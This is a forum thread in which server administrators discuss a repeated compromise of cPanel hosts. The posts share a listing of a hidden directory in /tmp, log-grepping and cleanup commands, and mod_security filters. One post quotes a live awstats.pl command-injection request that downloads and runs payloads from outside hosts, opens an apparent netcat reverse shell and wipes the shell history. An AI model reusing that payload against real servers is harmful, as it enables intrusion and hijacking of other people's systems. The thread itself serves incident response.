Crazy hacker.......

[amal]

Hi,

I have a really weird problem.....

He hosted ( via hack ) his domain on one of our cpanel servers .. the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it in one of my different servers...( actually, he tried it on many servers with that ip series.... ). Now, after removing him several times, he has switched to another hosts... I have been watching this site, and it's switching servers very easily.... the website in question is http://hothackers.com

I really don't understand, how he edits the httpd.conf ( permission 644, owned by root ) file and add entries which he like... The kernel on our server is 2.4.29-ow1 ( The open wall kernel is meant to be a secure one )... And the kernels are statically compiled( monolithic kermnel ) to avoid module level hacking. He has hacked both the Redhat9 and CentOS servers..... cpanel is updated to the latest stable version... Any idea how he's hacking , and how it can be prevented? At the meantime, he doesn;t have any problem hosting his site for free on anywhere he wants... Luckily, he is not with me anymore... he seems to be on a server hosted by theplanet....

And all his files are under the ownership of bin....

Anyone had any such experiences before? Any ideas would be greatly appreciated....

Regards,
Amal.

[anoopkumar]

ohhhhh, hothackers... I remember them very much... They hacked my server as well... No idea how they are doing it

[vincentg]

Check your domlogs

They get in mostly from holes in PHP aps
They then install their own shell app and god know what.

Also check your tmp directories for stuff like .../

I suggest you run securetmp which helps

[iCARus]

Hmmm... we found 1 wierd dirs like:

drwx------ 3 nobody nobody 1024 May 1 06:10 .\ /

How to delete that? We have securetmp from the first day and nothing hacked. But this one is wierd.

[chirpy]

Such files/directories are usually best deleted through sFTP - if you're not careful you can end up wiping your whole server.

[Jasonbd]

If this is the only directory in /tmp you could hit tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory then go in there to see what is there and then remove it.

[vincentg]

It can be deleted and it's where the main hacker files are located.

It may have a space before or after the name. They sometimes place several spaces after the name.

So you have .../[space] or what ever ---- (where [space] is a space)

Just do rm -fr .../

Make sure you get the line right else you may erase the wrong thing.

Try the cd command first - if you can cd to it then you know how to delete it.

You need to do three things fast.
First get rid of his files.
Reboot the server right after you delete the files.
Last you need to find the PHP app he used to get in.

This is the hard part.

Look for stuff like mydomain.com/help.php?q=http://somedomain

The hacker passes a domain to the app and it invokes the download of the tools the hacker uses which winds up in your tmp directory.

If you didn't use the script securetmp then you may find these files in usr/tmp or var/tmp as well

Securetmp makes it harder for them to do this stuff but is not 100% and a good hacker can get around it.

Vin

[iCARus]

Hello all.

Yes, it is "/tmp/..\[space]/" and files in it:

Code:

drwx------    3 nobody   nobody       1024 May  1 06:10 ./
drwxrwxrwt    7 root     root       406528 May  7 08:40 ../
-rw-r--r--    1 nobody   nobody        307 Mar 27 11:50 1.users
-rw-r--r--    1 nobody   nobody        393 Mar 27 11:51 2.users
-rw-r--r--    1 nobody   nobody        393 Mar 27 11:52 3.users
-rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
-rw-r--r--    1 nobody   nobody         34 Aug 15  2004 LinkEvents
-rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
drwx------    2 nobody   nobody       1024 May  1 06:10 randfiles/
-rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
-rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*

and directory in "/tmp/\[space]./"

Code:

drwx------    3 nobody   nobody       1024 May  7 01:21 ./
drwxrwxrwt    7 root     root       406528 May  7 08:44 ../
-rw-r--r--    1 nobody   nobody        608 May  7 00:00 1.users
-rw-r--r--    1 nobody   nobody        607 May  7 00:00 2.users
-rw-r--r--    1 nobody   nobody        610 May  7 00:00 3.users
-rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
-rw-r--r--    1 nobody   nobody      82057 May  7 00:00 JoJo.seen
-rw-r--r--    1 nobody   nobody       2706 May  5 19:51 LinkEvents
-rw-r--r--    1 nobody   nobody       1033 May  7 00:00 mech.levels
-rw-------    1 nobody   nobody          5 May  2 12:25 mech.pid
-rw-r--r--    1 nobody   nobody       1349 May  7 00:00 mech.session
-rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
drwx------    2 nobody   nobody       1024 May  7 01:21 randfiles/
-rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
-rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
-rw-r--r--    1 nobody   nobody      79359 May  7 00:00 TaKe.seen
-rw-r--r--    1 nobody   nobody      82548 May  7 00:00 ToTo.seen

Anyone knows anything about it ? How to find user accoutn from where this was created ? It looks like some bot. Hmm

[AndyReed]

Do you have Chkrootkit and RKhunter installed on your server? Do you also have mod_security?

You need to secure your server before it is too late.

[vincentg]

Delete the directory and files

run the script sercuretmp - this will help

He is using your server to spread a virus by sending emails out

You need to now find out how he got in.

Run these commands in shell and look for any refference to tmp

cd /usr/local/apache/domlogs

grep "/tmp" *;grep Wget *;grep wget *

You can run them one at a time like grep "/tmp" * if you get too much output or send the output to a file.

You will see something like somefile.php?q=some_url
The URL for some_url is another infected server
I would send them an email to notify them their server has been hacked.

Hackers use your server to A: break into other servers B: launch attacks or send virus emails out to hundreds of thousands.

There should be a government agency to crack down on these people but there is none.
Over time they will get better at hacking and it will create a major problem for the internet.
Most hackers are just in the learning stages at this point - thank god for that.

When they become pros you will have little defense and maybe no defense.

Vin

[vincentg]

Forgot one point - after you delete his files re-boot your server to remove any apps from memory!!!

Very important

Vin

[iCARus]

Thank you all for replies...

1. we have installed Chkrootkit and RKhunter and everything looks ok
2. if we try to look into domlogs we get error "-bash: /bin/grep: Argument list too long" ...is there any other way to look into over 100 logs ?
3. we deleted created dirs in /tmp
4. from the first day we use /tmp secured with securetmp

[vincentg]

you should be able to run the commands one by one.

grep "/tmp" *

grep wget *

grep Wget *

The first one will most likely show the most info on your hacker.

RKhunter is good to have but it shows false alarms for a few things.

You can also run this:

find / -type d -name ".*" -print

It will search your whole hard drive for funky entries
You will get many show up like ./foldername and some files that begin with a dot.
Those are normal - just look for ones that are not normal looking.

Vin

[anup123]

I see a frequent appearances of these in domlogs:

/cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%2 0ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3 b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066. 221.209.161%2065000%3bwget%20excalibur.go.ro%2ffir ewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bh istory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

i do not have awstats activated. This happens on 2 domains very frequently.

406 because of mod_sec

and it's all coming from cihost ip : 66.221.200.58

Anup

[HostMerit]

Might want to add

SecFilter "tar/x20"
SecFilter "go.ro"
SecFilter "chmod/x20"
SecFilter "wget"
SecFilter "rm/x20-rf"

This should help, of course, make sure mod_security is active on servers, also remove that script, and when the process is running, use ps -u nobody to get the pid, then go to /proc/(pid) and ls -al. You may see some virtual linked files to where the files are, usually /dev/shm, or /tmp, sometimes /var/spool i've seen, sometimes even /usr/local/apache/proxy, also cat the process's enviroment, might be able to pull a directory from there.

Also, this shouldn't cause any issues with regular sites, seems to be using Awstats exploit via script, or he's just uploading a script and calling it that

SecFilter "awstats.pl"

Since people should be acessing Awstats via Cpanel regardless shouldnt cause any issues.

Thanks,
Kris
Kris@HostMerit.com